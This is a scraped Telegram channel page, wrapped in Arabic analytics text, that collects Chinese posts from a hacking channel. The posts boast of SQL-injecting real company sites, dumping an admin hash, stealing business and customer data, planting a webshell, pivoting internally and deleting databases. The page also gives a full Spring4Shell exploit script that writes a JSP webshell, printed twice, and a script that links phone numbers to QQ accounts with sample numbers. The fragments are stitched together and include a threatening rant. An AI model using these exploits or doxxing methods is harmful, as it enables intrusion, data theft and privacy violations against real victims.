BYSGS会所---网站漏洞公布
频道主: @KHCHADANG 双向机器人: @SHANGGANSHEN_bot 我的接口频道: https://t.me/BYJIEKOSHEN 我的数据频道: https://t.me/SGSSHUJUKU 我的技术频道: https://t.me/HackerCCTV 我的倾诉频道: https://t.me/SGSYYDSNB 我的倾诉群聊: https://t.me/NNSGSYYDS 记住我的名字就好 我是个极度厌世的人
إظهار المزيد📈 نظرة تحليلية على قناة تيليجرام BYSGS会所---网站漏洞公布
تُعد قناة BYSGS会所---网站漏洞公布 (@hackercctv) في القطاع اللغوي الصينية لاعباً نشطاً. يضم المجتمع حالياً 14 206 مشتركاً، محتلاً المرتبة 8 705 في فئة التكنولوجيات والتطبيقات والمرتبة 14 832 في منطقة الصين.
📊 مؤشرات الجمهور والحراك
منذ تأسيسه في невідомо، حقق المشروع نمواً سريعاً وجمع 14 206 مشتركاً.
بحسب آخر البيانات بتاريخ 27 سبتمبر, 2026، تحافظ القناة على نشاط مستقر. خلال آخر 30 يوماً تغيّر عدد الأعضاء بمقدار -242، وفي آخر 24 ساعة بمقدار -30، مع بقاء الوصول العام مرتفعاً.
- حالة التحقق: غير موثّقة
- معدل التفاعل (ER): يبلغ متوسط تفاعل الجمهور 0%. وخلال أول 24 ساعة من النشر يحصد المحتوى عادةً N/A% من ردود الفعل نسبةً إلى إجمالي المشتركين.
- وصول المنشورات: يحصل كل منشور على متوسط 0 مشاهدة. وخلال اليوم الأول يجمع عادةً 0 مشاهدة.
- التفاعلات والاستجابة: يتفاعل الجمهور بانتظام؛ متوسط التفاعلات لكل منشور يبلغ 0.
- الاهتمامات الموضوعية: يركز المحتوى على مواضيع رئيسية مثل module.classloader, url, parent, resources.context, webshell.
📝 الوصف وسياسة المحتوى
يصف المؤلف القناة بأنها مساحة للتعبير عن الآراء الذاتية:
“频道主: @KHCHADANG
双向机器人: @SHANGGANSHEN_bot
我的接口频道: https://t.me/BYJIEKOSHEN
我的数据频道: https://t.me/SGSSHUJUKU
我的技术频道: https://t.me/HackerCCTV
我的倾诉频道: https://t.me/SGSYYDSNB
我的倾诉群聊: https://t.me/NNSGSYYDS
记住我的名字就好 我是个极度厌世的人”
بفضل وتيرة التحديث المرتفعة (أحدث البيانات بتاريخ 28 سبتمبر, 2026) تحافظ القناة على حداثتها ومستوى وصول مرتفع. وتُظهر التحليلات تفاعلاً نشطاً من الجمهور، ما يجعلها نقطة تأثير مهمة ضمن فئة التكنولوجيات والتطبيقات.
about.php?cid=1&id=2 这个URL存在注入风险。
直接上sqlmap,扫描结果非常给力:
一个时间盲注、一个布尔盲注、一个联合注入,UNION查询的存在,基本可以判断无WAF,直接开始脱库。
数据获取:
成功获取数据库 bdm10851955_db,其中 admin 表引起了我们的注意:
Database: bdm10851955_db
Table: admin
[1 entry]
+--------------+----------------------------------+
| aname | apass |
+--------------+----------------------------------+
| jhywzhht2511 | 122c79b410c885197c565617a1066142 |
+--------------+----------------------------------+
密码是MD5加密,没去暴力破解,感兴趣的可以自己试试
总结:
一个严重的SQL注入,直接导致后台失守。本来后面还有一个竞争条件可以拿shell,但懒得搞了,我要去玩明日方舟终末地!!!
作者: @Yuhui_ddos
来源: @Yuhui_netabout.php 参数存在sql注入漏洞。通过sqlmap进行探测,确认了时间盲注和联合查询注入的存在,并成功获取数据库 adm82571079_db 的权限。
深入数据库后发现,其中存放着公司最核心的业务数据。这里共计拿到该公司的一些技术数据,包括各类减速机、电机的核心设计图纸、技术参数、物料清单(BOM表)。此外,还获取了国内客户的详细联系方式、历年销售合同及定价策略,以及国内供应商名单。
接着,为进一步窃取服务器上的文件资料,我们利用SQL注入的 INTO OUTFILE 功能,在读取网站配置文件获取到物理路径后,成功写入webshell,控制了服务器
这里成功进入内网了,后续在进行内部资料寻找,把中心放在研发和财务部门的文件服务器中,不过都是支出流水和一些工作报告,没什么用
目前把sql数据库的东西全删了,网站还能访问,欢迎各位大牛访问。😄
ps:图片默认保存的路径找不到了,只能纯文本了QAQcurl -v "http://target:port/path?class.module.classLoader.URLs%5B0%5D=0"
原理:Spring 解析 classLoader.URLs[0]=0 时因类型不匹配(URL 数组无法赋值 0)抛出异常
以下代码来自开源项目
import requests
target_url = "http://target:port/helloworld/greeting"
payload_path = "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
# 发送payload
response = requests.get(target_url + payload_path)
if response.status_code == 200:
print("[+] 漏洞可能存在!访问 WebShell:http://target:port/tomcatwar.jsp?pwd=j&cmd=whoami")
else:
print("[-] 未检测到漏洞")
功能:自动发送 Payload 并写入 WebShell(路径:/tomcatwar.jsp),密码 pwd=j
访问 WebShell 执行命令:
curl "http://your-ip:8080/tomcatwar.jsp?pwd=j&cmd=whoami"
成功则返回服务器用户信息(如 root)
@Yuhui_ddos解压密码 https://t.me/yexiao_love_you脚本原理:Tim(轻量版QQ),批量手机号反QQ账号头像URL进行对比,因为是屏幕脚本所以需要root用户使用该脚本。 请使用Termux 安装相关的库 和 tsu,不懂的可以去问群里大牛 测试效果↓
17324958813 - http://thirdqq.qlogo.cn/g?b=oidb&k=4H0jEFqX9hJrD1FxvxVXQA&kti=aQm0VQwB4hA&s=40 15322509015 - http://thirdqq.qlogo.cn/g?b=oidb&k=o11FCyCnLqOEd1IDygg2AQ&kti=aQm03wwB4hA&s=40 15090536410 - http://thirdqq.qlogo.cn/g?b=oidb&k=5dJzT4bhyqNIPBibZHJqJUA&kti=aQm06AwB4hI&s=40注:里面的对比脚本要用电脑安装opencv,arm安卓不支持opencv termux运行主程序 mt管理器root运行配套sh 使用tim的搜索框部分实现 如果用不了就去自己抓xy坐标自己填到脚本里面 开发者模式开触摸坐标显示,长按查看上面显示的xy 脚本里面第一个坐标是搜索框的最右侧(不是清除,一定要靠右),第二个坐标是手机输入法的回车键 运行主程序py之前一定要给tim打开,自己随便搜一个手机号之后再点击一遍那个输入框
唯一留言:叮当猫管理员是我的吹牛资本,诈骗和装逼也是我的最强手段,我的所有能力来源别人的想象力,我的人脉全来自我的吹牛逼技术,得到很多人的好感度,我的一句话就能让我的人脉害死你全家,我的一句话就能让别人给我全国头接口玩,我喜欢拿着别人的全国头泛滥,然后栽赃陷害给别人,说是别人想要泛滥自己才泛滥,我喜欢装大佬,跟别人说Q反的方向是我给的,我脑电波意淫出来的邮箱Q反就是我的压箱底接口,这辈子不会泛滥,你以为我是接口神?错了,我接口都是巴结别人的!你以为我是逆向解密大牛?错了,我是巴结别人给我解密的!我的组织连几个卖号的都能进去,这就是我组织的魅力,没有指名道姓说谁,不要在评论区破防对号入座,希望改正好自己虚伪的性格,并不是对某组织所有人存在恶意,大部分人存在一定的实力,只是对某人的人品做单方面评价 没有指名道姓说谁哦~ 急=输 请不要指点江山 虽然这个Q反含金量再怎么低 我们也承认只是个概率Q反 但请不要因此说垃圾或没用 经典之:拿破仑发现新大陆回来之后名声大噪,但是很多人都在偷偷议论说只要有人一直开船向那个方向开,谁都可以发现新大陆。有一次拿破仑知道他们议论的事之后,跟周围的人说:“你们谁能将一个鸡蛋立在桌子上面而不动?”周围的人都没有动,静静看着拿破仑表演。拿破仑拿起鸡蛋砸的凹进去了一点,鸡蛋果然立在桌子上不动了。众人嘲笑道:“这有什么好炫耀的,人人都知道的道理罢了。”拿破仑说:“本身就没什么好炫耀的,可是先生们,女士们,你们怎么没想过用到这个方法呢?难道真的是因为你们想到了只是懒得动吗?”
curl -v "http://target:port/path?class.module.classLoader.URLs%5B0%5D=0"
原理:Spring 解析 classLoader.URLs[0]=0 时因类型不匹配(URL 数组无法赋值 0)抛出异常
以下代码来自开源项目
import requests
target_url = "http://target:port/helloworld/greeting"
payload_path = "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
# 发送payload
response = requests.get(target_url + payload_path)
if response.status_code == 200:
print("[+] 漏洞可能存在!访问 WebShell:http://target:port/tomcatwar.jsp?pwd=j&cmd=whoami")
else:
print("[-] 未检测到漏洞")
功能:自动发送 Payload 并写入 WebShell(路径:/tomcatwar.jsp),密码 pwd=j
访问 WebShell 执行命令:
curl "http://your-ip:8080/tomcatwar.jsp?pwd=j&cmd=whoami"
成功则返回服务器用户信息(如 root)